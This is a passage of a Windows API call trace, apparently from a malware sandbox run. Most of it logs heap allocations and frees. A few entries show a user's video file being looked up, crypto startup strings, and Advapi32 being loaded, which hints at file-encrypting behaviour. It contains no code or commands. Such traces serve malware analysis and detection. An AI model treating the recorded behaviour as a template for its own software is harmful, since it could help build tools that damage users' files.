(HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0097.492] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0097.492] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0097.492] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2490 [0097.492] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cb0 [0097.492] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0097.493] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0097.493] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2410 [0097.493] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d68 [0097.493] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0097.493] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2430 [0097.493] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0097.493] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0097.493] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d68 | out: hHeap=0x1780000) returned 1 [0097.493] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0097.493] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0097.493] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2510 [0097.493] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0097.493] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2450 [0097.493] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b90 [0097.493] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0097.493] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e24a0 [0097.493] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0097.493] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2360 [0097.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2360 | out: hHeap=0x1780000) returned 1 [0097.494] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9ba8 [0097.494] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0097.494] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e18 [0097.494] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2410 [0097.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e18 | out: hHeap=0x1780000) returned 1 [0097.494] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0097.494] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c08 [0097.494] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0097.494] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0097.494] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bc0 [0097.494] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2440 [0097.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bc0 | out: hHeap=0x1780000) returned 1 [0097.494] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f18 [0097.494] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bc0 [0097.494] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bd8 [0097.494] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0097.494] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e18 [0097.494] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24e0 [0097.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e18 | out: hHeap=0x1780000) returned 1 [0097.494] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0097.494] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e18 [0097.494] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e30 [0097.495] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0097.495] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e48 [0097.495] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2450 [0097.495] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca040 [0097.495] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9338 [0097.495] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0097.495] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0097.495] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca088 [0097.495] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0097.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca088 | out: hHeap=0x1780000) returned 1 [0097.495] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0097.495] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca088 [0097.495] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ed8 [0097.495] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2360 [0097.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ed8 | out: hHeap=0x1780000) returned 1 [0097.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2360 | out: hHeap=0x1780000) returned 1 [0097.495] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0097.495] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0e8 [0097.495] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2360 [0097.495] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0a0 [0097.495] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0097.495] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0097.496] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca118 | out: hHeap=0x1780000) returned 1 [0097.496] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0097.496] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0097.496] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f38 [0097.496] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2390 [0097.496] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f38 | out: hHeap=0x1780000) returned 1 [0097.496] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0097.496] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0097.496] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ed8 [0097.496] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0097.496] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ed8 | out: hHeap=0x1780000) returned 1 [0097.496] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0097.496] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0097.496] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ed8 [0097.496] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0097.496] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f38 [0097.496] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0097.496] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0097.496] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0097.496] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0097.496] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0097.496] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0097.496] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0097.497] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0097.497] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0097.497] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0097.497] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0097.497] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0097.497] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0097.497] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0097.497] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0097.497] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0097.497] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0097.497] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0097.497] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0097.497] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0097.497] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0097.497] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0097.497] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0097.497] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0097.497] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0097.497] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0097.497] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0097.497] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0097.497] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\8PG6kQ2SW4h7w.flv", lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbcf9a80, ftCreationTime.dwHighDateTime=0x1d5e5d4, ftLastAccessTime.dwLowDateTime=0x562e60b0, ftLastAccessTime.dwHighDateTime=0x1d5ef80, ftLastWriteTime.dwLowDateTime=0x562e60b0, ftLastWriteTime.dwHighDateTime=0x1d5ef80, nFileSizeHigh=0x0, nFileSizeLow=0x139d5, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="8PG6kQ2SW4h7w.flv", cAlternateFileName="8PG6KQ~1.FLV")) returned 0x41ac140 [0097.498] FindClose (in: hFindFile=0x41ac140 | out: hFindFile=0x41ac140) returned 1 [0097.498] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0097.498] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0097.498] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0097.498] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0097.498] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0097.498] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0097.498] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0097.498] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0097.498] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0097.498] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0097.498] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0097.498] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0097.498] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0097.498] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0097.498] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0097.498] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0097.498] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0097.499] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0097.499] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0097.499] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0097.499] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0097.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0097.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0097.555] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0097.555] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0097.555] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0097.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca430 [0097.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0097.555] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0097.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0097.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0097.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391e38 [0097.555] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0097.555] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391e38 | out: hHeap=0x1780000) returned 1 [0097.555] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0097.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca370 [0097.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0097.555] PeekMessageW (in: lpMsg=0x144ea0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ea0c) returned 0 [0097.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0097.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0097.555] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0097.555] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0097.555] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0097.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0097.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0097.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ee8 [0097.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0097.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0097.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0097.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac000 [0097.556] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0097.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0097.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0097.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0097.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0097.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0097.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0097.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0097.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0097.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0097.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0097.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0097.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0097.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0097.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0097.556] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0097.557] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0097.557] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0097.557] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0097.557] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0097.557] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0097.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0097.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0097.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0097.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ec8 [0097.557] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0097.557] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0097.557] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0097.557] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0097.557] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0097.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0097.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391c40 [0097.557] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0097.557] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391c40 | out: hHeap=0x1780000) returned 1 [0097.557] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0097.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0097.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e25b0 [0097.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0097.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0097.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0097.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0097.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca3d0 [0097.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0097.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0097.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0097.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0097.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0097.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0097.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0097.558] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0097.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0097.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0097.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0097.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0097.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0097.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0097.558] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0097.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0097.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0097.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0097.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0097.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0097.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0097.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0097.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0097.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0097.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0097.559] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0097.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0097.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0097.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0097.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0097.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0097.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0097.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) 